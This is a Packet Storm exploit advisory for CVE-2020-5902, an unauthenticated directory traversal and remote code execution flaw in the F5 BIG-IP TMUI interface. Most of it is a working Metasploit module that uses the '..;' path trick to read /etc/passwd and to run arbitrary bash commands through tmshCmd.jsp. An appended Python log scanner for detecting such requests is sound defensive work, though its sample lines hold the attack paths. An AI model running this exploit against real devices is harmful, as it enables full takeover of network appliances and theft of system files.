F5 BIG-IP TMUI Unauthenticated Remote Code Execution

Published: 09 Mar 2026. Reported by: indoushka. Type: packetstorm. Source: packetstorm.news

Unauthenticated remote code execution in F5 BIG-IP TMUI via directory traversal.

=============================================================================================================================================
    | # Title     : F5 BIG-IP TMUI Unauthenticated Remote Code Execution                                                                        |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.f5.com/fr_fr/products/big-ip                                                                                    |
    =============================================================================================================================================
    
    [+] Summary    : A critical vulnerability exists in the Traffic Management User Interface (TMUI) component of F5 Networks BIG-IP devices that allows
                     unauthenticated attackers to perform remote command execution (RCE) through a directory traversal flaw.
                     The issue is tracked as CVE-2020-5902 and affects multiple versions of BIG-IP where the TMUI administrative interface is exposed.
                     The vulnerability stems from improper input validation in TMUI endpoints such as fileRead.jsp and tmshCmd.jsp.
                     By exploiting a crafted path containing the traversal sequence ..;, an attacker can bypass authentication and access internal JSP components. This allows:
    
    Arbitrary file read (e.g., /etc/passwd)
    
    Execution of system commands via tmsh utilities
    
    Full compromise of the affected BIG-IP system
    
    Attackers can issue specially crafted HTTP requests to the vulnerable TMUI interface, enabling them to execute commands as the underlying system user without authentication.
    
    [+] Successful exploitation may result in:
    
    Remote command execution on the device
    
    Disclosure of sensitive system files
    
    Complete takeover of the BIG-IP appliance
    
    Potential network pivoting if the device sits in a trusted infrastructure position
    
    [+] This vulnerability was publicly disclosed on 1 July 2020 and is considered critical severity, with active exploitation observed shortly after disclosure.
    
    Affected Product: F5 BIG-IP TMUI
    
    Vendor: F5 Networks
    
    CVE: CVE-2020-5902
    
    [+] Impact:
    
    Unauthenticated Remote Code Execution
    
    Arbitrary File Disclosure
    
    Full System Compromise
    			  
    [+] POC   :  
    
    ##
    # Exploit Title: F5 BIG-IP TMUI Remote Code Execution
    # Framework: Metasploit
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      prepend Msf::Exploit::Remote::AutoCheck
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'F5 BIG-IP TMUI Remote Code Execution',
          'Description'    => %q{
            This module exploits a directory traversal vulnerability in the
            F5 BIG-IP TMUI interface that allows unauthenticated attackers
            to execute arbitrary system commands via tmshCmd.jsp.
          },
          'Author'         =>
            [
              'indoushka'
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              ['CVE', '2020-5902'],
              ['URL', 'https://support.f5.com/csp/article/K52145254']
            ],
          'Platform'       => 'linux',
          'Arch'           => [ ARCH_CMD ],
          'Targets'        =>
            [
              ['Automatic Target', {}]
            ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => '2020-07-01'
        ))
    
        register_options(
          [
            OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
            OptString.new('FILEPATH',  [ false, 'File to read for vulnerability check', '/etc/passwd' ])
          ]
        )
      end

      def check
        print_status("Checking if target is vulnerable...")
    
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(
            target_uri.path,
            'tmui',
            'login.jsp',
            '..;',
            'tmui',
            'locallb',
            'workspace',
            'fileRead.jsp'
          ),
          'vars_get' =>
          {
            'fileName' => datastore['FILEPATH']
          }
        })
    
        return CheckCode::Unknown unless res
    
        if res.code == 200 && res.body.include?('root:')
          return CheckCode::Vulnerable
        end
    
        CheckCode::Safe
      end
    
      def exploit
        print_status("Launching exploit...")
    
        execute_command(payload.encoded)
      end

      def execute_command(cmd, opts = {})
        vprint_status("Executing command: #{cmd}")
    
        encoded = Rex::Text.uri_encode("run util bash -c '#{cmd}'")
    
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(
            target_uri.path,
            'tmui',
            'login.jsp',
            '..;',
            'tmui',
            'locallb',
            'workspace',
            'tmshCmd.jsp'
          ),
          'vars_get' =>
          {
            'command' => encoded
          }
        })
    
        fail_with(Failure::Unknown, "No response from server") unless res
      end
    end
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
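
For defenders, the requests described above have a recognisable shape: a path under /tmui/ that contains the `..;` sequence and ends in fileRead.jsp or tmshCmd.jsp. The following is an added example, not part of the original advisory or of any F5 tooling, that scans web-server access logs for that shape. It assumes Apache combined log format; the sample lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Apache combined log format (assumed format, not from a real device).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Jul/2020:10:12:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [05/Jul/2020:10:12:44 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1834 "-" "curl/7.68.0"',
    '203.0.113.9 - - [05/Jul/2020:10:13:02 +0000] "GET /tmui/login.jsp/..%3b/tmui/locallb/workspace/tmshCmd.jsp?command=CONSTRUCTED HTTP/1.1" 404 210 "-" "curl/7.68.0"',
    '198.51.100.7 - - [05/Jul/2020:10:14:10 +0000] "GET /tmui/tmui/login/images/logo.gif;v=2 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    'garbage line that is not an access-log entry',
]

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# JSP endpoints named in the advisory, mapped to what a hit on them means.
ENDPOINTS = {"fileread.jsp": "file_read", "tmshcmd.jsp": "tmsh_command"}

def fully_unquote(s, rounds=3):
    """Percent-decode up to `rounds` times so encoded forms of '..;' are normalised."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify(target):
    """Return a finding label for a request target, or None if it does not match."""
    path = fully_unquote(urlsplit(target).path).lower()
    if "/tmui/" not in path or "..;" not in path:
        return None
    return ENDPOINTS.get(path.rsplit("/", 1)[-1], "traversal_other")

def scan(lines):
    """Return one dict per matching request; lines that do not parse are skipped."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        src, ts, _method, target, status = m.groups()
        kind = classify(target)
        if kind:
            # A 200 means the request was served rather than rejected: escalate those first.
            findings.append({"src": src, "time": ts, "kind": kind, "served": status == "200"})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```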
